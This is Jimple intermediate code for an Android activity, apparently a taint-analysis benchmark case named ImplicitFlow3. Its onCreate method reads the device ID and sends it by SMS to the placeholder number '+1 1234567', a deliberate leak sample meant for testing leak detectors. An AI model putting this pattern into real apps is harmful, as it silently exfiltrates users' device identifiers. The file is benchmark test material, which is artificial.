public class de.ecspride.ImplicitFlow3 extends android.app.Activity
{

    public void <init>()
    {
        de.ecspride.ImplicitFlow3 r0;

        r0 := @this: de.ecspride.ImplicitFlow3;

        specialinvoke r0.<android.app.Activity: void <init>()>();

        return;
    }

    protected void onCreate(android.os.Bundle)
    {
        de.ecspride.ImplicitFlow3 r0;
        android.os.Bundle r1;
        java.lang.String r2, r4;
        android.telephony.SmsManager r3;
        java.lang.Object $r5;
        android.telephony.TelephonyManager $r6;

        r0 := @this: de.ecspride.ImplicitFlow3;

        r1 := @parameter0: android.os.Bundle;

        specialinvoke r0.<android.app.Activity: void onCreate(android.os.Bundle)>(r1);

        virtualinvoke r0.<de.ecspride.ImplicitFlow3: void setContentView(int)>(2130903040);

        $r5 = virtualinvoke r0.<de.ecspride.ImplicitFlow3: java.lang.Object getSystemService(java.lang.String)>("phone");

        $r6 = (android.telephony.TelephonyManager) $r5;

        r2 = virtualinvoke $r6.<android.telephony.TelephonyManager: java.lang.String getDeviceId()>();

        r3 = staticinvoke <android.telephony.SmsManager: android.telephony.SmsManager getDefault()>();

        r4 = "huhu";

        virtualinvoke r3.<android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)>("+1 1234567", null, r2, null, null);

        staticinvoke <toy_benchmark.ErrorFunction: void Error()>();

        return;
    }

    public void tester()
    {
        de.ecspride.ImplicitFlow3 r0;

        r0 := @this: de.ecspride.ImplicitFlow3;

        virtualinvoke r0.<de.ecspride.ImplicitFlow3: void onCreate(android.os.Bundle)>(null);

        virtualinvoke r0.<de.ecspride.ImplicitFlow3: void onCreate(android.os.Bundle)>(null);

        staticinvoke <toy_benchmark.ErrorFunction: void Error()>();

        return;
    }
}
